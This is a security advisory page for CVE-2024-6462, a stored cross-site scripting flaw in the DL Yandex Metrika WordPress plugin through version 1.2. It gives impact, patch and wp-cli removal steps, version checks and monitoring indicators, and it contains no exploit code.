CVE-2024-6462
📋 TL;DR
The DL Yandex Metrika WordPress plugin through version 1.2 contains a stored cross-site scripting (XSS) vulnerability in its settings. This allows authenticated administrators to inject malicious scripts that execute when other users view affected pages, even in WordPress multisite setups where unfiltered_html is restricted. Only WordPress sites using this specific plugin are affected.
💻 Affected Systems
- DL Yandex Metrika WordPress Plugin
📦 What is this software?
Dl Yandex Metrika by Dyadyalesha
⚠️ Risk & Real-World Impact
Worst Case
An attacker with admin privileges could inject malicious JavaScript that steals session cookies, redirects users to phishing sites, or performs actions on behalf of authenticated users, potentially leading to complete site compromise.
Likely Case
Malicious admin injects tracking scripts or defaces the site by modifying plugin settings with XSS payloads that affect all users viewing those settings pages.
If Mitigated
With proper access controls limiting admin privileges to trusted users only, the vulnerability has minimal impact as it requires high-privilege access.
🎯 Exploit Status
Exploitation requires admin-level access to WordPress. The vulnerability is in plugin settings that don't properly sanitize input before storage and output.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version 1.3 or later
Vendor Advisory: https://wpscan.com/vulnerability/0880fa33-3efa-4f50-83c8-4c90cb805eb9/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find 'DL Yandex Metrika' plugin. 4. Click 'Update Now' if update available. 5. If no update available, deactivate and delete the plugin, then install version 1.3+ from WordPress repository.
🔧 Temporary Workarounds
Remove vulnerable plugin
allDeactivate and delete the vulnerable plugin if Yandex Metrika functionality is not required
wp plugin deactivate dl-yandex-metrika
wp plugin delete dl-yandex-metrika
Restrict admin access
allLimit WordPress admin privileges to only essential, trusted users
🧯 If You Can't Patch
- Remove admin access from untrusted users and implement principle of least privilege
- Deactivate the DL Yandex Metrika plugin entirely until patching is possible
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin panel > Plugins > Installed Plugins for 'DL Yandex Metrika' with version 1.2 or earlierCheck Version:
wp plugin get dl-yandex-metrika --field=versionVerify Fix Applied:
Verify plugin version is 1.3 or later in WordPress admin plugins page📡 Detection & Monitoring
Log Indicators:
- Unusual modifications to plugin settings by admin users
- JavaScript payloads in plugin option values in database
Network Indicators:
- External script loads from Yandex Metrika plugin pages that don't match expected patterns
SIEM Query:
source="wordpress" AND (event="plugin_updated" AND plugin_name="dl-yandex-metrika" AND version<="1.2") OR (event="plugin_activated" AND plugin_name="dl-yandex-metrika")